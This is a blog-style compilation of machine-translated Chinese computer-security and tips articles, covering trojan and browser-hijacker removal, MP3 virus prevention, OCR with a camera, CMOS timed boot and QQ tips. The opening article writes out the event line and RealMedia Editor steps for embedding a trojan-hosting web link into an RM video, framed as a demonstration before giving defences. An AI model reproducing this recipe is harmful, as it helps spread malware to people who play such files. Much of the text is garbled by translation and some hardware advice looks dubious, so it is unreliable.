Wednesday, March 31, 2010

RM file, the Trojan how to do

RM file, the Trojan how to do?

51 during the overcrowded everywhere, I still chooses to stay home to spend not less than seven days is not long holiday, in fact, and I have a lot of people have the same arrangement, such as Jia Jia MM is the case. In order to alleviate the pressure of work some time ago, and she intends to stay quietly at home which did not go, prepare for and survive with a variety of large, are so-called "517 days music, at home happy."
51 just two days, on the third day woke up early in the morning, I suddenly received a MM Jia Jia calls for help. "East-yu brother, I would like to give you something to discuss at noon today I ask you to eat right? "This sentence makes lying in bed, I thought I was dreaming, and even pinch a few of their own. "Is Hong Menyan! Need to know before I invite her to dinner, have refused to compliment to the place, today actually invited me to dinner, there must be some demand for me. "Right on cue, at dinner time, Jia Jia, MM said he might have fallen into the system, Trojan horses and let him help us to see.
eating mouth is short, there is no way home after dinner I went to MM. Having carefully reviewed the process of the system and found a suspicious "iexplore.exe" process. "This is not IE browser, do the process, I do not run ah, how does such a process? "My heart has thrown doubt," It seems that your system must be in some kind of Trojan horses, IE browser, it is called. "
" In addition to these days, I downloaded three movies, nothing to download ah! "MM says. So I have three films, it was discovered Unexpectedly, which has some strange link. Trojan appears to be in a web page, this simple, find the page, then solve the problem, clear out the system in the Trojan horse.
"to see several of his films will be in the Trojan horse? "Jia Jia MM asked, puzzled. "You do not say that only RealPlayer player, users will do in the Trojan horse? I use MPC, but ah, how has the Trojans out? "I had to explain:" In the past, only RealPlayer player, can be in the web page Trojans, but now the invasion of ways with each passing day is simply impossible to defend ah. Today, just empty, so you can show off, to see how the intruder RM file to add malicious code. , "done all that as soon as hands-on demonstration to the MM.
reproduce RM Trojan Hoax
"As the RM file is the most commonly used on the network, one of the multimedia file types, so this way the spread of Trojan Web page that allows users face even more endangered Wide . In fact, this method was first used in communication networks advertising, but now has been an intruder used, and to the general RM files to your page links to Trojan operations are not complicated, with some ready-made tools can be completed, such as Helix Producer Plus, RealMedia Editor. "I give an introduction to the MM.
"First of all to prepare a RM video file as a Trojan the spread of pages of raw materials, the best there are some attractive elements, or the victim would not have to watch the Trojan is triggered that time period. There is also an advantage is that, when a user relish the time to watch movies is not going to care about the pop-up pages. "I have to add a bit.
I first open the Notepad program, create a text file, enter the following in the above section of code, and then save it as mm.txt:
u 00:00:20.0 00:00:30.0 & & ; _rpexternal & & http://www.cpcw.com/test.htm
me explain the meaning of this code. Where u is the event flags (Flag), said to be inserted in the document is a URL address. Then the third field represents the starting and ending point in time, the unit format is "hours: minutes: seconds. Ms\Open the URL, rather than using the default browser to open Realplayer embedded URL. Here that when the players to the first 20 seconds or to drag the playback progress of the first 20-30 seconds, when at any time between, RM files will automatically call the system default browser to open "http://www.cpcw.com/ test.htm "link to this page, which will install Trojan programs to the user's system.
Then I run the RM video files, editing tools RealMedia Editor, click on "File" menu under "Open the Real Media file" command to open a previously prepared that part of the normal RM video files, and then click the & ldquo ; Tools "menu under the" merger event "command, select the text file that you just saved. Finally, click "File" menu under the "RealMedia File Save As" command, it would be saved as a new RM file, so that a Trojan horse to bring the web page document produced by RM.

for MM Weapon
For this malicious RM files to prevent, different situations can be used in different ways. For those who can download to your hard drive in the RM file, we can be called a "Real media filter" software on the suspicious RM file handling, which may contain some of the web links and special effects plus removal of out. Run "Real media filter" in the "source document" and "Save As" option to the appropriate settings, and then click "Start Filtering" button you can remove the suspicious RM file redundant links (Figure 2). Filtration is complete, the program will pop up a dialog box and prompts filter content.
In addition, if the user using MPC to play, you can decode the Real media file type is set to DirectShow can be, since the use of DirectShow format can be automatically screened out these ads. But since RM file is the company's exclusive Real format, so DirectShow format for some special RM files can not be decoded. Then only use the RealMedia format player, but the ads feature will automatically shield failure.
finally reminded lovely MM, in time to the Microsoft website to download the latest security patches to plug the loopholes in the system and software; install the latest anti-virus software and update virus database; install the network firewall, blocking does not require port, and the process of trying to connect to the Internet to conduct careful screening.

Hackers attacked the remote to send data, so that frequent computer crashes, then how to solve

Hackers attacked the remote to send data, so that frequent computer crashes, then how to solve?

A: The approach is: immediately disconnect the network. For dial-up Internet users, to immediately stop hackers offline connection; while LAN users, as long connected to the Internet, always liable to be attacked, the general should install personal firewall, just click the firewall " disconnected from the network "button, you can connect immediately stop hackers.

while off the network, should immediately press the "Ctrl + Alt + Del" key combination to check whether the system is running any suspicious process, once found, they should immediately stop it.
then they need to run antivirus software to remove. To prevent virus attacks, many users have installed on your computer anti-virus software, as long as the time to upgrade, these anti-virus software can remove most of the existing Trojan.

MP3 face threat how to do

MP3 face threat how to do

today's digital products is becoming increasingly popular, which will gradually attract more attention of virus writers, and perhaps pass on all elated songs are also infected with many viruses, the virus develop good habits if the virus would not be crazy spread.

we use the MP3 player in the process, it is often necessary to MP3 and computer connections after the file copy, this MP3 player is very prone to virus infections, we should from the following aspects years for prevention.

1. Open the write-protect switch

If the MP3 player with a write-protect switch, and do not write files to the device, preferably in front of the computer connected to the write-protect open switch, so cut off from the source of virus transmission.

2. Install anti-virus software for mobile

now more well-known antivirus manufacturers have introduced specifically for MP3, flash memory and mobile hard drives used in mobile devices such as antivirus software. Of course, mobile anti-virus software installed, we must promptly update the virus database, so as to provide against possible trouble.

3. to manually change the contents of the directory

If your MP3 player, there is no write-protect switch, but also there is no mobile version of antivirus software, then there is a relatively simple way to prevent the virus from invasion. MP3 player in the root directory of the following tools for manually via Notepad to create a name for the "Autorun.inf" file, so a number of viruses in the future will not be able to go to the root directory of the following MP3 player automatically generated "Autorun.inf" file, and can not carry out the illegal distribution of MP3 players. Similarly, the anti-virus method is also applicable for mobile hard disk. This method can prevent the majority of low-level viruses, but if you encounter high-level hackers write viruses, then the application of other methods antivirus.

4. a virus then the application-specific software to format

Even these measures, and sometimes can not be completely avoided infection MP3 phenomenon. Our MP3 infected with virus how to do? Then we must note that in the absence of virus before treatment, do not connect the MP3 to a different computer to use, because that may cause cross-infection, the spread of the virus to further expand the scope of .

at this time we have to do is to format the MP3 player deal, in the format of the process, paying particular attention to choose the correct file format. In addition to the extent possible use of the supplied formatting program (usually a random CD or a manufacturer's official Web site are provided), or may occur after the MP3 format can not be normal use issues.

virus security view includes more and "MP3 encountered threat how to do" related articles, for this introduction to the article is quite many. If you like to learn computer knowledge, please keep in mind the only site domain name

How do I remove Radmin Trojan

How do I remove Radmin Trojan

network security can not be ignored, believe it or let you hit. Recent Radmin Trojan on the network itinerant criminal madness. If we start by cleaning up the registry key approach to deal with it if it is not able to successfully removed. Because Radmin items through the service to start, and the highly covert. If you are not familiar with the system service, really could not challenge. But then the cunning fox is also able to escape a hunter's eyes. Here we take a look at the anti-crime from Hunan pioneer boat is how to clear cunning Radmin Trojan horse.

to describe the situation
the computer mouse pointer slide for no reason, such as by others in operation. And some more computer software programs, which actually also broadband account viewer. Computers also sometimes automatically restart, or will be closed. At the end of Internet access fees paid to the 电疑营业厅 found that the use of more inexplicable ChinaVnet spending bills online, but I do not have to purchase through Telecom ChinaVnet anything 呀.
ferret out behind
Under these circumstances, my first impression is that in the gray pigeons Trojan. Who called gray pigeons "notorious" mean? Subsequently, prompt action to upgrade anti-virus software, a comprehensive system scan. But in the long process of killing nothing. So I decided in accordance with the "computer reported" vanguard of the anti-crime methods described in manual strangulation gray pigeons, but found not in the gray pigeons Trojan.
really can not be reconciled, I am not it Gaobu Ding a small "horse"? I do not despair, and a careful investigation and system processes and found a suspicious process r_server.exe, found that the process consumes less memory, but the computer in the event of failure that I have described, they suddenly increased, showing that a back door program. End it immediately, and open the registry at HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run to find the location of the value of suspicious loads.
But let my disappointment, did not r_server.exe loaded value, Is it uses what is the latest high-tech? I am thinking all at once broken. So I decided to open a "Command Prompt" type "netstat-an" to see the computer used for all connections with the ports, I found an illegal occupation of 4899 port, and saw the remote control of my IP天址. This time Louchumajiao of.

eliminate Radmin evil "horse"
According to all the signs, online view, I guess I am in the Radmin Trojan. Radmin Trojan's default port is 4899, and the use of Radmin Trojan different from the ordinary run load value, and the Trojan antivirus software, previously considered to be "innocent person" because of its original role is to help network management for remote operation . However, abuse by hackers to others in the illegal invasion, anti-virus software, it also had "thrown down the killer."
I open the Registry Editor, use the process name r_server.exe as a keyword Trojan scan quickly search to the relevant key, I accidentally click to open the "Display Name" key changes to items found in numerical data for "Remote Administrator Service\
here I have a clear way of working Radmin Trojan, and it is not through the run key to load, but through the "service" to load. Know that work like handled. I opened the service items, turn into the "Control Panel → Administrative Tools → Services\Trojan and some of the main program directory will delete DLL files, and then the primary key Radmin deleted, Radmin was thus dispels.

In this case, we can see a computer intruder in the rowboat on the kinds of Trojans, the stolen boat broadband account through ChinaVnet of consumption, this is a despicable, while this is Crime! Ah Liang here to remind you that if the demand for services do not use ChinaVnet, the best online shopping to the offices are closed function to prevent a loss.
Radmin Trojan uses easy for everyone to ignore the service mode to start Trojans, an increase of all anti-crime problems. But then again, and then can not escape the cunning fox hunter's eyes. As long as Trojan horses, are usually occupied by the port system, as long as we have found have been illegally occupied by the port, and then follow it back, we can find a way to clear the Trojans.
finally prompted you to close the redundant services not only enables the system performance can also be added to the system a certain extent, the safety factor. If we require the services of the system are not familiar with, can make use of super-rabbits optimization software, in its start-optimization of the system can be set to start the service. Must not arbitrarily shut down their service, or may lead to system crashes.

Tuesday, March 30, 2010

6700.cn the virus to bind browser home problem-solving approach

6700.cn the virus to bind browser home problem-solving approach

browser is a malicious virus binding site www.6700.cn the home page, page can not be restored, how to solve? 6700.cn the virus hijack the browser, how to remove 6700.cn virus, 6700.cn modify your browser home page, 6700.cn clear way what is? See this article Xiang Jie.


1.6700.cn cleared the first step: Delete the following files into the Safe Mode


c: \ windows \ dyulty \ spoolsv.vbe

< p>
c: \ windows \ system32 \ sdfi \ spool.vbs


c: \ windows \ system32 \ yttl.sys


c: \ windows \ system32 \ \ drivers \ \ wbstgt00.sys


c: \ windows \ system32 \ drivers \ apaidi.sys


c: \ windows \ system32 \ drivers \ qeiq.sys

2.6700.cn Clear Step two: Remove the restart after the repair the following:


start-up projects - start running regedit registry remove the following entries:


[360tray]


[360safe]


start-up projects - service - start to run msconfig the driver of the Disable the following items:


[YTTL / YTTL] <\?? \ C: \ WINDOWS \ system32 \ yttl.sys>


[wbstgt00 / wbstgt00] <\ SystemRoot \ system32 \ \ drivers \ \ wbstgt00.sys>


[plkgos / plkgos] <\?? \ C: \ DOCUME ~ 1 \ ADMINI ~ 1 \ LOCALS ~ 1 \ Temp \ plkgosfoc>


[Apaidi / Apaidi] < ; \?? \ C: \ WINDOWS \ system32 \ drivers \ Apaidi.sys>


[agrs / agrs] <\ SystemRoot \ system32 \ drivers \ qeiq . sys>


3.6700.cn Clear Step three: do not trust the security guards of then 360 fixes IE, repair services, management boot entry.


4.6700.cn clear finish: Modify Home for their own site you want.

virus security view includes more and "6700.cn virus to bind browser home problem-solving method" related articles, for this introduction to the article is quite many. If you like to learn computer knowledge, please keep in mind the only site domain name

What means to save you, my drug tyrants

What means to save you, my drug tyrants
Kingsoft you for the loyal players attention, we not encountered a virus firewall or drug tyrants Web Firewall, firewall, not open chat situation. Should we do anything like it? No, let a few of you next dedicated to drug tyrants, "revived" OF THE CHEATS.
1. to re-start the firewall (Note: only for Windows 2000/Windows XP)
in the "Start → Run\firewalls; Run "C: \ kav6 \ kavsvc" / install, then restart the firewall should be no problem.
2. restart the firewall and chat website
off drug overlord firewall program, run Regsvr32 "C: \ kav6 \ KAIEPlus.DLL\
3. for Kingsoft V, just to the path kav6 replaced kav5 on it.
4. For Windows 9X/Me, make sure that kavsvc9x.exe to random start. Starts group inside KAVSvc9X.exe.
Note: The above path only for the default installation path, if your installation path is D: \ Program Files \ Kingsoft \ KAV6, then the corresponding run the command should be "D: \ Program Files \ Kingsoft \ KAV6 \ kavsvc "/ uninstall.

Monday, March 29, 2010

Digital Cameras Input language skills

Digital Cameras Input language skills

with a digital camera for fast text entry, it is very simple and is made into a photo spread into the computer, and then recognition software to convert plain text file format can be.


Whenever your boss throw a thick stack of files, so you are typing a word for word the computer, do you feel is not going to collapse? Have you ever thought, a digital camera you can make it better and more economical to "typist"?


Today, digital cameras have large numbers into ordinary homes. For ordinary users, the use of digital cameras to shoot photos, it is only right and proper thing. However, with digital cameras to input text, I am afraid that most people in the eyes of a little fantasy. Now, let's first look at the Du Men capacity unique skills - with digital cameras to input the text of the real "Kung Fu Hustle."


shooting


with a 300-million or more pixels, more than 3 times optical zoom digital camera that filmed the original manuscript. When shooting should note: the manuscript should be flat, the camera should end flat, light to gentle uniform. Can scatter light in the corridor or window, the three primary colors can also be taken under fluorescent lamp eye protection.


taken correctly identify clearly the key to the later, 300 million or more pixels can guarantee for identification after shooting the text is large enough; 3 times optical zoom when shooting so that the manuscript in each of lines covered the screen. I have been comparing the 300-megapixel shot than shooting with 2 million pixels recognition rate is significantly higher.


Do not use flash, light is too strong, shot down but the writing is not clear.



conversion


in the computer's hard drive to create a folder, the photographed images into one. However, these images contrast is very small, the entire screen is gray; and a variety of digital camera image format is different, OCR software (OCR software) may not be able to support, so we are advised to use ACDSee or Windows built-in "Paint & rdquo ; program conversion.


writer is a Windows comes with the "Paint" program to convert the. First, the order click on "Paint → File → Open" in the "Look In" to find the pictures, open and click "Save As" in the "Save as type" Select " monochrome bitmap. "


Click "Save\Converted obtained new pictures follow the original name, changing the extension to ". Bmp\


identification


run OCR software (which can be downloaded from the Internet, the author uses Tsinghua TH-OCR2000 Millennium Professional Edition), then click "File → Open" in the "Look" and find your pictures. Click on "order" drop-down menu appears, if the need for full recognition, you can click on "all recognition\The upper part of the software window after shooting, the converted original image, the lower part of the text is identified. Recognition followed automatically created after the original name of the txt file, saved in the original file folder.


If only identify part of the text, press and hold the left mouse button in the need to identify parts of the text pulled out the box, there a yellow block, click on "identification" can be.


finishing


created at the beginning of the file folder to find the extension txt plain text file file, this is the information needed for identifying the wrong word to modify, especially in the text emphasis added and underlined text recognition rate is still relatively low. At the same time in the file folder, there are many extensions chr, trc, sim files, which are generated when OCR recognition temporary files can be deleted.


application skills view includes more and "digital cameras, text entry techniques" related to the article, for the first capacity in this area is still quite a lot of articles, if you think this article is the wrong place, or Do you have a unique insight, you are welcome to express their views to the computer knowledge and recommendations of the Forum. If you like to learn computer knowledge, please keep in mind the only site domain name

CMOS settings change from time to time to achieve the computer boot _153

CMOS settings change from time to time to achieve the computer boot

we all know, computers can regularly shut down, shut down the program by calling the windows from time to time, or from time to time off software can be achieved. But the timing is not so simple boot must be particularly aware of the CMOS settings, through the CMOS settings from time to time the boot, then boot from time to time how the set up it? I give you to be a specific answer.



Timer-Power set-up steps:


the first to enter "CMOS SETUP" program (most of the motherboard is the computer starts, press the DEL key to enter); and then be moved to the light "Power Management Setup" option, enter into its sub-menu; and then "Resume by Alarm" item is set to "Enabled\2, ... ...), the "Time (hh: mm: ss) Alarm" item to set the boot time; finally save the settings, restart, when the closure of the computer, your computer will be provided in your time of auto - Start.


have to pay attention to the points


1. Your computer motherboard must have a "Resume by Alarm" function can be achieved from time to time the boot;


2. to achieve the computer boot from time to time, we must cancel windows Power-on password;


3. connected to the host power supply.


application skills, and view includes more "CMOS settings to change from time to time to achieve the computer boot" related articles, for the first capacity in this area is still quite a lot of articles, if you think this article is the wrong place, or you have a unique perspective, you are welcome to express their views to the computer knowledge and recommendations of the Forum. If you like to learn computer knowledge, please keep in mind the only site domain name

The long-term damage to the hard drive of six commonly used software

The long-term damage to the hard drive of six commonly used software

long-term damage to the hard drive of six commonly used software


hard drive is the most important computer storage media, on the hard disk maintenance, I believe that every computer user has to understand. However, there was a lot of articles are aimed at single user dial-up era, the increasing popularity of broadband and large hard drives continue to lower prices today, many people will open up our computers so that the hard disk running at full capacity: see high-clear DVDRip films, carried out without interruption The BT download, use Windows System Restore feature in ... ...



However, you may not be aware that these new software applications to bring new models will bring new damage to the hard disk! New application model of the potential threat



1. Frequent defragging



Disk Defragmenter, and System Restore was originally provided by the normal function of Windows, but if you frequently do this manipulation is detrimental to the hard drive of. Defrag the hard disk to the bottom of the analysis, to determine what data can be moved, what data can not be moved, and then sort of archival classification. The formal arrangements for hard disk data structure before it continued to random read write data to the other clusters, line up the order and then move the data back to the appropriate location, such manipulation would occupy a lot of CPU and disk resources.



Indeed, right now in terms of a large hard drives, documents, and e-mail the space occupied by a very small percentage, most people buy a large hard disk is used to hold movies and music, these partitions no need frequent order - because of the effect of playing multimedia files and the disk structure does not really matter, play speed is determined by the video card and CPU.



2. Windows XP's automatic restart



Windows XP automatic restart feature that automatically closed the process of non-response to automatically withdraw the illegal manipulation of the program, thereby reducing the user's manipulation of the steps. However, this feature is also a very big issue: it will automatically re-start before the closure of the hard disk power supply, when you restart the machine and then open the hard disk power! As a result, the hard disk in less than 10 seconds time interval by the current two shocks, it may occur all of a sudden "death" failures. In order to save some energy set to let the system automatically closed to the hard disk, the hard drive is also more harm than good.



3. Coding errors DVDRip



Now online transcripts from the DVD video format, compressed DVDRip very popular. This version of the movie clearly is almost the same degree and DVD, but downloading a movie is only 700MB ~ 1.3GB size, so many users like to format DVDRip movie downloaded to your hard drive slowly to enjoy. However, play this format film have high requirements for the system: In addition to CPU, graphics cards require robust enough to ensure smooth playback, the disk load is also very large - due to play DVDRip is a constant decoding decompression, and then conveying to the display system process.





I found that there are coding errors encountered DVDRip files, Windows will appear very high occupancy rate of the disk phenomenon: the system continually want to bring into encoded video signal, but the coding error in the file index and the corresponding signal segment is not match the - and this time, the hard disk constantly flickering lantern, the whole system very slow to respond to user manipulation, a user clicks on the menu but almost no response. If coding errors are more, the system will sometimes crash. Many users are very impatient at this point, directly press the RESET button on the chassis and even the direct closure of the computer power supply, hard disk head is not properly reset the case, this manipulation is very dangerous!





Tip: Windows XP users who require special attention, when we preview some of Windows XP automatically larger ASF, WMV and other files, of course, there is no formal play, but it can also occur suddenly slow computer speed, hard drive lights constantly flicker phenomenon, its ringleader ringleader is still wrong encoding video files!



4. Bittorrent download



Bittorrent Download the emerging broadband era model of P2P exchange of files, all users share resources with each other when the seed and relay stations, commonly known as BT download. Because each user's download and upload is almost at the same time, so download very quickly. However, it will download data directly written into the hard drive (unlike FlashGet download tools such as cache can be adjusted to the specified amount of data written to disk before), so the occupancy rate of the hard drive is much greater than the FTP to download! " br />




In addition, BT download in advance to apply for hard disk space, at a time when downloading larger files, generally there will be 2 to 3 minutes for the entire system have all been the priority task of the space occupied by other tasks very slow response. Some people in order to take full advantage of the bandwidth, but also a few BT download tasks at the same time, this time is very easy to avoid high occupancy rate due to a disk crash caused by failures.





Therefore, unless your computer's hardware configuration is very high (especially the memory, at least in the 256MB and above), or to make improvements prior to the BT download, and if lengthy, multi-tasking to download applications, best traditional FTP software.



5. PQMAGIC the risk of conversion



PQMAGIC is the famous Partition Magic, can not destroy the data in the case of free to adjust the partition size and format. However, PQMAGIC recently launched, the general user's hard drive also 2GB, while the now 60 ~ 80GB hard drive is already everywhere, PQMAGIC already powerless: the adjustment with the data, 5 GB or more of the partitions, usually require a more than an hour!



In addition to factors outside the capacity, PQMAGIC adjust the hard disk partition, a lot of time is spent checking the data and testing the hard disk, it can be seen, in this case, "non-destructive partition" is very difficult to guarantee: As the conversion speed is very slow, time-consuming and too long, the conversion process of readjustment, it is easy because of computer power outages, crashes and other factors result in data loss. Such losses are usually one or several partitions is lost, or the capacity to become abnormal, serious and even cause the entire hard drive can not read the data.



6. The hard disk protection software anomaly caused by



Easily be caused by hard disk abnormalities, as well as the hard disk protection software. For example, "Restore Wizard\At this point thinking about install and uninstall the "Restore Wizard\This failure is due to the "Restore Wizard" took over the INT13 interrupt control system in the control of the hard drive before the boot, using FDISK / MBR command can not be solved.





This is just the software have been failures, but many of them inexperienced, out of the subject will find a variety of partitioning tool "test\/ "

QQ software, using the tips of four

QQ software, using the tips of four

"using the QQ software, four tips" is based on book knowledge, on-line information, the actual manipulation of the article summed up the experience, if you want to know more of these topics, please pay attention to practical application of view includes more many articles!


now playing QQ pay attention to a word "cool." So, while there are a lot of tips here, even our selection, we will first offer four.


1. Quickly transfer files quickly if you want to send the file to your friends, first of all be found in the local disk you want to send the file, drag it to QQ in your friend's nickname on the hover a moment, at this time will automatically open with you QQ Friends of the chat window, and then he submitted the request to send the file.


2. Group members recognize the true face of a lot of times we do not have additive group of some members of friends, if this guy that frequent changes to his nickname, to distinguish him in the end is a Who really is trouble. QQ 2004 provides a "group of business card" feature, if the friend set up business cards, we can by right-clicking its nickname, choose "View data\status at a glance the.



3. Refused to base the picture information QQ 2004 promised to everyone in the group using 从定义表情 and send screen shots, if your network more slowly, which will take up a lot of bandwidth, it is that we can by clicking the group in the toolbar's " current legislation banning receive picture "to remove the trouble.


4. Bulletin of harassment we reject ads using the QQ in the process of positive numbers often receive from the mobile phone text message 10000 Tencent harassment, right? In the QQ 2004, we can switch to the "phone friend" window, the numbers can be pulled blacklist.


application skills view includes more and "use QQ software, four small skills" related articles, for the first capacity in this respect the article is quite many. If you like to learn computer knowledge, please keep in mind the only site domain name

Clear your system 3721

Clear your system 3721

1. Delete the 3721 files to install the location of the file is stored by default in the C drive C: \ Windows \ Downloaded Program Files \

C: \ Windows \ (this directory there are a Cns *. dat files)

C: \ Windows \ System32 \ Drivers \

C: \ Program Files \ 3721 \ 2. Delete the 3721 registry garbage in the registry HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run item the next there is a CsnMin registered ------" Rundll32.exe C : \ Windows \ downlo ~ 1 \ CnsMin.dll, Rundll32 ".

HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Enum \ Root \ LEGACY_CNSMINKP

HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ CnsMinKP

HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet003 \ Enum \ Root \ LEGACY_CNSMINKP

HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet003 \ Services \ CnsMinKP

HKEY_USERS \ S-1-5-21-1708537768-1303643608-725345543-500 \ Software \ Microsoft \ Internet Explorer \ MenuExt \ Quick Search (Yisou.com)

Hope that through the above efforts, you have after an absence of 3721 brings you trouble